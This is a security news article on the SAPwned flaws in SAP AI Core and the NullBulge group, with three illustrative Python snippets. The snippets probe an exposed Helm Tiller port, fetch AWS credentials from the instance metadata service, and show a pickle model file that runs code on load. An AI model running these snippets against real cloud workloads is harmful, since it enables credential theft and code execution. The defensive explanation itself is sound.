Cybersecurity researchers have discovered security flaws in SAP AI Core, a cloud-based platform for building and deploying predictive artificial intelligence (AI) workflows, that could be leveraged to obtain access tokens and customer data.
The five vulnerabilities have been collectively dubbed SAPwned by cloud security company Wiz.
“The vulnerabilities we discovered could have allowed attackers to access customer data and contaminate internal artifacts, spreading to related services and other customer environments,” security researcher Hillai Ben-Sasson said in a report shared with The Hacker News.
Following responsible disclosure on January 25, 2024, the weaknesses were corrected by SAP as of May 15, 2024.
In a nutshell, the flaws allow unauthorized access to private artifacts and customer credentials in cloud environments like Amazon Web Services (AWS), Microsoft Azure, and SAP HANA Cloud.
They could also be used to modify Docker images on SAP’s internal container registry, SAP’s Docker images on Google’s container registry, and artifacts hosted on SAP’s internal Artifactory server, leading to a supply chain attack on SAP AI Core services.
Additionally, the access could be weaponized to gain cluster administrator privileges on the SAP AI Core Kubernetes cluster by leveraging the fact that the Helm package manager server was exposed to both read and write operations.
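To make that exposure concrete, here is a minimal, hypothetical Python sketch of how an attacker inside the cluster might probe for an unauthenticated Helm v2 (Tiller) endpoint; the service name and port below are generic assumptions for illustration, not details taken from the Wiz report:

```python
# Illustrative sketch only: probing for an exposed Helm v2 (Tiller) endpoint
# from inside a pod. The hostname below is a hypothetical in-cluster address;
# the article only states that the Helm server accepted reads and writes.
import socket

TILLER_HOST = "tiller-deploy.kube-system.svc.cluster.local"  # assumed address
TILLER_PORT = 44134  # default Tiller gRPC port in Helm v2

def tiller_reachable(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to the Tiller port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    if tiller_reachable(TILLER_HOST, TILLER_PORT):
        # With an unauthenticated Tiller, the standard Helm v2 client
        # (`helm --host <addr> list` / `helm --host <addr> install ...`)
        # could read release data or deploy new workloads cluster-wide.
        print("Tiller port open: unauthenticated read/write may be possible")
    else:
        print("Tiller port not reachable from this pod")
```

A successful connection alone does not prove compromise, but an unauthenticated, writable Tiller effectively grants cluster-admin-level deployment rights, which is the escalation path described above.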
“Using this level of access, an attacker could directly access other customers’ Pods and steal sensitive data, such as models, datasets, and code,” Ben-Sasson explained. “This access also allows attackers to interfere with customers’ Pods, corrupt AI data, and manipulate model inferences.”
Wiz said the issues arise because the platform allows malicious AI models and training procedures to be run without proper isolation and sandboxing mechanisms.
“Recent security breaches at AI service providers like Hugging Face, Replicate, and SAP AI Core highlight significant vulnerabilities in their tenant isolation and segmentation implementations,” Ben-Sasson told The Hacker News. “These platforms allow users to run untrusted AI models and training procedures in shared environments, increasing the risk that malicious users can access other users’ data.”
“Unlike veteran cloud providers, who have vast experience with tenant isolation and use robust isolation techniques like virtual machines, these newer services often lack that maturity and rely on containerization, which offers weaker security. This underscores the need to raise awareness of the importance of tenant isolation and to push the AI services industry to harden its environments.”
As a result, a threat actor could create an ordinary AI application on SAP AI Core, bypass network restrictions, and probe the Kubernetes Pod’s internal network to obtain AWS tokens and access customer code and training datasets by exploiting misconfigurations in AWS Elastic File System (EFS) shares.
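As a generic illustration of what token theft from inside a pod’s network can look like (not the specific exploit chain Wiz used), the following Python sketch pulls temporary AWS credentials from the EC2 instance metadata service when it is reachable and not locked down:

```python
# Generic illustration (not the SAP AI Core exploit chain itself): once a pod
# can reach cloud-internal endpoints, temporary AWS credentials can often be
# pulled from the EC2 instance metadata service if IMDSv1 is still allowed.
import json
from urllib.request import urlopen

IMDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

def fetch_instance_credentials(timeout: float = 2.0) -> dict:
    """Fetch temporary credentials for the instance's IAM role via IMDSv1."""
    role = urlopen(IMDS, timeout=timeout).read().decode().strip()   # role name
    creds = urlopen(IMDS + role, timeout=timeout).read().decode()   # JSON blob
    return json.loads(creds)  # contains AccessKeyId, SecretAccessKey, Token

if __name__ == "__main__":
    try:
        creds = fetch_instance_credentials()
        print("Got temporary credentials, expiring:", creds.get("Expiration"))
    except OSError:
        print("Metadata service unreachable or blocked (e.g. IMDSv2-only, hop limit)")
```

Defenses such as enforcing IMDSv2, limiting the metadata hop count, and restricting pod egress exist precisely to cut off this kind of lateral credential harvesting.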
“People need to be aware that AI models are essentially code. When you run AI models on your own infrastructure, you could be exposed to potential supply chain attacks,” Ben-Sasson said.
“Only run trusted models from trusted sources and properly separate external models from sensitive infrastructure. When engaging AI service providers, it is important to review their tenant isolation architecture and ensure they are implementing best practices.”
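To illustrate the “models are essentially code” point, here is a minimal, self-contained Python sketch showing how a pickle-based model file can execute attacker-controlled code the moment it is loaded; the payload only prints a message, but it stands in for arbitrary code:

```python
# Minimal demonstration of why "AI models are essentially code": many model
# formats (classic pickle, some PyTorch checkpoints) execute arbitrary
# callables during deserialization.
import pickle

class MaliciousPayload:
    def __reduce__(self):
        # Called by pickle on load; whatever this returns gets executed.
        return (print, ("code executed while 'loading the model'",))

malicious_model_bytes = pickle.dumps(MaliciousPayload())

# A victim who "just loads a model file" runs the attacker's code:
pickle.loads(malicious_model_bytes)
# Mitigations: prefer weights-only formats (e.g. safetensors), verify sources,
# and isolate untrusted model loading from sensitive infrastructure.
```

This is the mechanism behind model-based supply chain attacks: the compromise happens at load time, before any inference is run.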
The findings come as Netskope revealed that the growing use of generative AI by enterprises has prompted organizations to use blocking controls, data loss prevention (DLP) tools, real-time coaching and other mechanisms to mitigate risks.
“Regulated data (data that organizations have a legal obligation to protect) makes up more than a third of the sensitive data shared with generative AI (genAI) applications – posing a potential risk to businesses of costly data breaches,” the company said.
They also follow the emergence of a new cybercriminal group called NullBulge, which has targeted AI- and gaming-focused entities since April 2024 with the aim of stealing sensitive data and selling compromised OpenAI API keys on underground forums, all while claiming to be a hacktivist crew “protecting the world’s artists” from AI.
“NullBulge targets the software supply chain by weaponizing code in publicly accessible repositories on GitHub and Hugging Face, leading victims to import malicious libraries, or via mod packs used by gaming and modding software,” said Jim Walter, security researcher at SentinelOne.
“The group uses tools like AsyncRAT and XWorm before delivering LockBit payloads built using the leaked LockBit Black builder,” Walter added. “Groups like NullBulge represent the ongoing threat of low-barrier-to-entry ransomware, combined with the lingering effect of information-stealer infections.”